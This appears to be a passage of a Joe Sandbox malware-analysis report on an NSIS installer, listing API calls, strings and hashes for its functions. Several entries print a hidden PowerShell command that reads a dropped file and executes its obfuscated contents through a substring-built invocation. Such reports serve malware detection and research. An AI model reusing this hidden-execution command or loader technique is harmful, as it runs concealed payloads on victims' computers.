                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                      • String ID: "C:\Users\user\Desktop\anziOUzZJs.exe"$C:\Users\user~1\AppData\Local\Temp\$\*.*
                                      • API String ID: 2035342205-686800114
                                      • Opcode ID: 460e34fa800b99f1e5f166b8e7224cb9b6121c256d4ab4e0343d3576c8fd47da
                                      • Instruction ID: 44541a5d5af4c0b2911f4644f2fa5328a4f1ed3919081d24b86541679c9c03d6
                                      • Opcode Fuzzy Hash: 460e34fa800b99f1e5f166b8e7224cb9b6121c256d4ab4e0343d3576c8fd47da
                                      • Instruction Fuzzy Hash: 9F51CF30804A04BADF217A658C85BBF7AB8DF82318F54847BF445761D2C73D4982EE6E

                                      Control-flow Graph (rendered graph not reproduced here; first basic block 40205e-4020c3)
                                      APIs
                                      • CoCreateInstance.OLE32(00407408,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 004020DD
                                      • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,?,00000400,?,00000001,004073F8,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402189
                                      Strings
                                      • C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe, xrefs: 0040211D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: ByteCharCreateInstanceMultiWide
                                      • String ID: C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe
                                      • API String ID: 123533781-143564976
                                      • Opcode ID: 98c6856de954bf32f67bc9aae575288044ef0a57168b27d926b9bae310f30c25
                                      • Instruction ID: 15b8319daa3a69dadbe16bc3493db081a7dc62ee607a685d27ecc12527328b4b
                                      • Opcode Fuzzy Hash: 98c6856de954bf32f67bc9aae575288044ef0a57168b27d926b9bae310f30c25
                                      • Instruction Fuzzy Hash: 785138B1A00208BFCF10DFA4C988A9D7BB5FF48319F20856AF515EB2D1DB799941CB54
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e28a8ad83f22bfe4c4d455a141f03dc38bf257c2203b46f6b1d5cba347f55b6d
                                      • Instruction ID: a8746b25a1c6b49bbeafbf020c2dfcaa04563a9eac1a8e827fb2969916571183
                                      • Opcode Fuzzy Hash: e28a8ad83f22bfe4c4d455a141f03dc38bf257c2203b46f6b1d5cba347f55b6d
                                      • Instruction Fuzzy Hash: 70F17670D00229CBCF18CFA8C8946ADBBB1FF44305F25816ED856BB281D7786A96CF44
                                      APIs
                                      • FindFirstFileA.KERNELBASE(771B3410,00421558,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,0040589C,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,00000000,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp,771B3410,?,C:\Users\user~1\AppData\Local\Temp\,004055BB,?,771B3410,C:\Users\user~1\AppData\Local\Temp\), ref: 00406008
                                      • FindClose.KERNEL32(00000000), ref: 00406014
                                      Strings
                                      • C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp, xrefs: 00405FFD
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Similarity
                                      • API ID: Find$CloseFileFirst
                                      • String ID: C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp
                                      • API String ID: 2295610775-3559984709
                                      • Opcode ID: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
                                      • Instruction ID: 1297c1e42099762feae64532f60583430090df1d404adb2e37743a0561846f6f
                                      • Opcode Fuzzy Hash: fb61142ecab510d9bb051178c92cda44e9a3fae507c1338c77e1024ce068b834
                                      • Instruction Fuzzy Hash: 8CD012319491206BC3105B38AD0C85B7A599F593317118A33F567F52F0C7788C7296E9

                                      Control-flow Graph
                                      APIs
                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403A47
                                      • ShowWindow.USER32(?), ref: 00403A64
                                      • DestroyWindow.USER32 ref: 00403A78
                                      • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403A94
                                      • GetDlgItem.USER32(?,?), ref: 00403AB5
                                      • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403AC9
                                      • IsWindowEnabled.USER32(00000000), ref: 00403AD0
                                      • GetDlgItem.USER32(?,00000001), ref: 00403B7E
                                      • GetDlgItem.USER32(?,00000002), ref: 00403B88
                                      • SetClassLongA.USER32(?,000000F2,?), ref: 00403BA2
                                      • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403BF3
                                      • GetDlgItem.USER32(?,00000003), ref: 00403C99
                                      • ShowWindow.USER32(00000000,?), ref: 00403CBA
                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00403CCC
                                      • EnableWindow.USER32(?,?), ref: 00403CE7
                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403CFD
                                      • EnableMenuItem.USER32(00000000), ref: 00403D04
                                      • SendMessageA.USER32(?,000000F4,00000000,00000001), ref: 00403D1C
                                      • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403D2F
                                      • lstrlenA.KERNEL32(Concrescences Setup: Completed,?,Concrescences Setup: Completed,00422F00), ref: 00403D58
                                      • SetWindowTextA.USER32(?,Concrescences Setup: Completed), ref: 00403D67
                                      • ShowWindow.USER32(?,0000000A), ref: 00403E9B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                      • String ID: Concrescences Setup: Completed
                                      • API String ID: 3282139019-732904307
                                      • Opcode ID: 3ac918ef0a42e48e667534ebe08b1c5e2c6f4e88b6f53ea8c8a8fe3e2e231469
                                      • Instruction ID: e8e4c14712e0ebd1bd3c96694815290efe84e81baa174b168cbdfcdac135d6c4
                                      • Opcode Fuzzy Hash: 3ac918ef0a42e48e667534ebe08b1c5e2c6f4e88b6f53ea8c8a8fe3e2e231469
                                      • Instruction Fuzzy Hash: 29C1DF71A04205BBDB20AF61EE45E2B3E7CFB45706B40453EF601B11E1C779A942AB6E

                                      Control-flow Graph
                                      APIs
                                        • Part of subcall function 00406092: GetModuleHandleA.KERNEL32(?,?,?,00403143,00000009), ref: 004060A4
                                        • Part of subcall function 00406092: GetProcAddress.KERNEL32(00000000,?), ref: 004060BF
                                      • lstrcatA.KERNEL32(1033,Concrescences Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Concrescences Setup: Completed,00000000,00000002,771B3410,C:\Users\user~1\AppData\Local\Temp\,"C:\Users\user\Desktop\anziOUzZJs.exe",00000000), ref: 004036F4
                                      • lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe,1033,Concrescences Setup: Completed,80000001,Control Panel\Desktop\ResourceLocale,00000000,Concrescences Setup: Completed,00000000,00000002,771B3410), ref: 00403769
                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 0040377C
                                      • GetFileAttributesA.KERNEL32(: Completed), ref: 00403787
                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe), ref: 004037D0
                                        • Part of subcall function 00405C57: wsprintfA.USER32 ref: 00405C64
                                      • RegisterClassA.USER32(00422EA0), ref: 0040380D
                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403825
                                      • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040385A
                                      • ShowWindow.USER32(00000005,00000000), ref: 00403890
                                      • GetClassInfoA.USER32(00000000,RichEdit20A,00422EA0), ref: 004038BC
                                      • GetClassInfoA.USER32(00000000,RichEdit,00422EA0), ref: 004038C9
                                      • RegisterClassA.USER32(00422EA0), ref: 004038D2
                                      • DialogBoxParamA.USER32(?,00000000,00403A0B,00000000), ref: 004038F1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: "C:\Users\user\Desktop\anziOUzZJs.exe"$.DEFAULT\Control Panel\International$.exe$1033$: Completed$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe$Concrescences Setup: Completed$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                      • API String ID: 1975747703-2523469666
                                      • Opcode ID: 5c13432dcba976acc153c6c4cb0ae4a4ceee92b52a3611d71cd5da1aeea12791
                                      • Instruction ID: cdcda0c5d6d895e27caec97b3fe99e3f57ebd92391a3aca4eab7d54baf018be6
                                      • Opcode Fuzzy Hash: 5c13432dcba976acc153c6c4cb0ae4a4ceee92b52a3611d71cd5da1aeea12791
                                      • Instruction Fuzzy Hash: FA61C8B16442007ED620BF669D45F373AACEB44759F40447FF941B22E2C77CAD029A2D

                                      Control-flow Graph
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00402C77
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\anziOUzZJs.exe,00000400), ref: 00402C93
                                        • Part of subcall function 0040596C: GetFileAttributesA.KERNELBASE(00000003,00402CA6,C:\Users\user\Desktop\anziOUzZJs.exe,80000000,00000003), ref: 00405970
                                        • Part of subcall function 0040596C: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405992
                                      • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\anziOUzZJs.exe,C:\Users\user\Desktop\anziOUzZJs.exe,80000000,00000003), ref: 00402CDF
                                      Strings
                                      • "C:\Users\user\Desktop\anziOUzZJs.exe", xrefs: 00402C66
                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00402C6D
                                      • C:\Users\user\Desktop\anziOUzZJs.exe, xrefs: 00402C7D, 00402C8C, 00402CA0, 00402CC0
                                      • Null, xrefs: 00402D5D
                                      • soft, xrefs: 00402D54
                                      • C:\Users\user\Desktop, xrefs: 00402CC1, 00402CC6, 00402CCC
                                      • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402E3E
                                      • Inst, xrefs: 00402D4B
                                      • Error launching installer, xrefs: 00402CB6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: File$AttributesCountCreateModuleNameSizeTick
                                      • String ID: "C:\Users\user\Desktop\anziOUzZJs.exe"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\anziOUzZJs.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                      • API String ID: 4283519449-3613515333
                                      • Opcode ID: 3f665217ac2245ad92c498c6fa1e551097c863ebe5e03bc44dd447b4a8322165
                                      • Instruction ID: 1839f4375b44da3097aca9d4a8c6c84b0463c2d100b7a2d698c12080187f488f
                                      • Opcode Fuzzy Hash: 3f665217ac2245ad92c498c6fa1e551097c863ebe5e03bc44dd447b4a8322165
                                      • Instruction Fuzzy Hash: BF51B6B1A41214ABDF109F65DE89B9E7AB4EF00355F14403BF904B62D1C7BC9E418B9D

                                      Control-flow Graph
                                      APIs
                                      • lstrcatA.KERNEL32(00000000,00000000,CreateTimer,C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe,00000000,00000000,00000031), ref: 00401790
                                      • CompareFileTime.KERNEL32(-00000014,?,CreateTimer,CreateTimer,00000000,00000000,CreateTimer,C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe,00000000,00000000,00000031), ref: 004017BA
                                        • Part of subcall function 00405CF9: lstrcpynA.KERNEL32(?,?,00000400,00403187,00422F00,NSIS Error), ref: 00405D06
                                        • Part of subcall function 00404F12: lstrlenA.KERNEL32(sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4B
                                        • Part of subcall function 00404F12: lstrlenA.KERNEL32(00402FCF,sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5B
                                        • Part of subcall function 00404F12: lstrcatA.KERNEL32(sportspladsers,00402FCF,00402FCF,sportspladsers,00000000,0040E8C0,00000000), ref: 00404F6E
                                        • Part of subcall function 00404F12: SetWindowTextA.USER32(sportspladsers,sportspladsers), ref: 00404F80
                                        • Part of subcall function 00404F12: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FA6
                                        • Part of subcall function 00404F12: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC0
                                        • Part of subcall function 00404F12: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FCE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                      • String ID: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"$C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe$C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp$C:\Users\user~1\AppData\Local\Temp\nsu2C03.tmp\nsDialogs.dll$CreateTimer
                                      • API String ID: 1941528284-3015429203
                                      • Opcode ID: 717bbc974399765322aab804ce65b0cd2922970306079a4e6ebe60fbc67e86b2
                                      • Instruction ID: dfa66b7161a0f16b13ad00a25904a83b243dedeb6ee7557d1be3b523159fd244
                                      • Opcode Fuzzy Hash: 717bbc974399765322aab804ce65b0cd2922970306079a4e6ebe60fbc67e86b2
                                      • Instruction Fuzzy Hash: 5641D572910515BACF107BB5CC85EAF3679EF45329B20823BF521F20E2D63C4A419B6D

                                      Control-flow Graph
                                      APIs
                                      • lstrlenA.KERNEL32(sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4B
                                      • lstrlenA.KERNEL32(00402FCF,sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5B
                                      • lstrcatA.KERNEL32(sportspladsers,00402FCF,00402FCF,sportspladsers,00000000,0040E8C0,00000000), ref: 00404F6E
                                      • SetWindowTextA.USER32(sportspladsers,sportspladsers), ref: 00404F80
                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FA6
                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC0
                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FCE
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      Similarity
                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                      • String ID: sportspladsers
                                      • API String ID: 2531174081-2609567324
                                      • Opcode ID: 558402415f57fe0eb81db75807d2d057a66030d2c136bde9c432be6294094776
                                      • Instruction ID: 5a9a404093729f8c7a4ed64dcb73daf90ff889549f225b9df3951733f5861a8d
                                      • Opcode Fuzzy Hash: 558402415f57fe0eb81db75807d2d057a66030d2c136bde9c432be6294094776
                                      • Instruction Fuzzy Hash: EB219DB1A00119BADF119FA5DD84ADEBFB9EF44354F14807AF904B6290C7788E41DBA8

                                      Control-flow Graph

                                      [Control-flow graph of the function at 004053D8 (basic blocks 635-640): calls CreateDirectoryA, GetLastError and SetFileSecurityA]
                                      APIs
                                      • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user~1\AppData\Local\Temp\), ref: 0040541B
                                      • GetLastError.KERNEL32 ref: 0040542F
                                      • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405444
                                      • GetLastError.KERNEL32 ref: 0040544E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: ErrorLast$CreateDirectoryFileSecurity
                                      • String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user\Desktop$ds@$ts@
                                      • API String ID: 3449924974-228423945
                                      • Opcode ID: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                      • Instruction ID: 5d613d5f07efa900d759e60f8f8ec78c4c71b6ffd2fe208e339ff175f81ef67f
                                      • Opcode Fuzzy Hash: f69d3160a82a2859f106a017fa20b71bd819ec85ae22b078452fa26fbc967781
                                      • Instruction Fuzzy Hash: F3010871D14259EADF119FA0D9487EFBFB8EB04315F00417AE904B6280D378A644CFAA

                                      Control-flow Graph

                                      [Control-flow graph of the function at 00406024 (basic blocks 641-647): calls GetSystemDirectoryA, wsprintfA and LoadLibraryExA]
                                      APIs
                                      • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040603B
                                      • wsprintfA.USER32 ref: 00406074
                                      • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406088
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: DirectoryLibraryLoadSystemwsprintf
                                      • String ID: %s%s.dll$UXTHEME$\
                                      • API String ID: 2200240437-4240819195
                                      • Opcode ID: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                      • Instruction ID: 72752c577983536edbae7b7a4b2c1439e1101fa4b93fa8d0208d5a4e16dde88a
                                      • Opcode Fuzzy Hash: 38f932dad6d10820f3564912fa7e39c047c8ada2afd73a6a353afcde48b08f1a
                                      • Instruction Fuzzy Hash: E6F0FC30A40109AADB14E764DC0DFEB365CAB09305F140576A546E11D1D578E9258B69

                                      Control-flow Graph

                                      [Control-flow graph of the function at 00402E9F (basic blocks 648-711): calls GetTickCount, MulDiv, wsprintfA and the internal functions 0040307B, 00403091, 00404F12, 00405A13, 00406175 and 00406195]
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: CountTick$wsprintf
                                      • String ID: ... %d%%
                                      • API String ID: 551687249-2449383134
                                      • Opcode ID: 9602dbfda00556d7c5e8c3807bc55e7cb8e0f1d2c4b54ec9ade86eedd9cec4cc
                                      • Instruction ID: 4ab2a5a1bcd3fb7fa9d72e81aa521510b391fe67da8672e6f00875cd24a8b3cf
                                      • Opcode Fuzzy Hash: 9602dbfda00556d7c5e8c3807bc55e7cb8e0f1d2c4b54ec9ade86eedd9cec4cc
                                      • Instruction Fuzzy Hash: 7D518F729022199BDF10DF65DA08A9F7BB8AF40795F14413BF800B72C4C7789E51DBAA

                                      Control-flow Graph

                                      [Control-flow graph of the function at 00401F90 (basic blocks 712-743): calls GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary and the internal functions 00401423, 00402A3A, 00403619 and 00404F12]
                                      APIs
                                      • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401FBB
                                        • Part of subcall function 00404F12: lstrlenA.KERNEL32(sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000,?), ref: 00404F4B
                                        • Part of subcall function 00404F12: lstrlenA.KERNEL32(00402FCF,sportspladsers,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,00402FCF,00000000), ref: 00404F5B
                                        • Part of subcall function 00404F12: lstrcatA.KERNEL32(sportspladsers,00402FCF,00402FCF,sportspladsers,00000000,0040E8C0,00000000), ref: 00404F6E
                                        • Part of subcall function 00404F12: SetWindowTextA.USER32(sportspladsers,sportspladsers), ref: 00404F80
                                        • Part of subcall function 00404F12: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404FA6
                                        • Part of subcall function 00404F12: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404FC0
                                        • Part of subcall function 00404F12: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404FCE
                                      • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FCB
                                      • GetProcAddress.KERNEL32(00000000,?), ref: 00401FDB
                                      • FreeLibrary.KERNELBASE(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402045
                                      Strings
                                      • "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)", xrefs: 0040200F
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
                                      • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                      • String ID: "powershell.exe" -windowstyle hidden "$Mitokoromono=Get-Content 'C:\Users\user~1\AppData\Local\Temp\Servicebureauet\aloe\Ruralt.Tea';$Advokatfuldmgtigs=$Mitokoromono.SubString(69838,3);.$Advokatfuldmgtigs($Mitokoromono)"
                                      • API String ID: 2987980305-2894214451
                                      • Opcode ID: c931239866a18927b86319141aba466e32f85728b26c7023af3430785e4db318
                                      • Instruction ID: 033e4e5f5e4c037d50d2464c5542d6b5672e4837e9f8cb01fb8d89ff16108e1c
                                      • Opcode Fuzzy Hash: c931239866a18927b86319141aba466e32f85728b26c7023af3430785e4db318
                                      • Instruction Fuzzy Hash: 1A212B72904211FBDF217FA48E49AAE76B1AB45318F30423BF701B62D0C7BD49459A6E

                                      Control-flow Graph

                                      [Control-flow graph of the function at 0040599B (basic blocks 744-749): calls GetTickCount and GetTempFileNameA]
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 004059AF
                                      • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 004059C9
                                      Strings
                                      • nsa, xrefs: 004059A6
                                      • "C:\Users\user\Desktop\anziOUzZJs.exe", xrefs: 0040599B
                                      • C:\Users\user~1\AppData\Local\Temp\, xrefs: 0040599E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1323012124.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1322994460.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323033977.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.000000000041F000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000424000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323049585.0000000000432000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1323200513.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_anziOUzZJs.jbxd
                                      Similarity
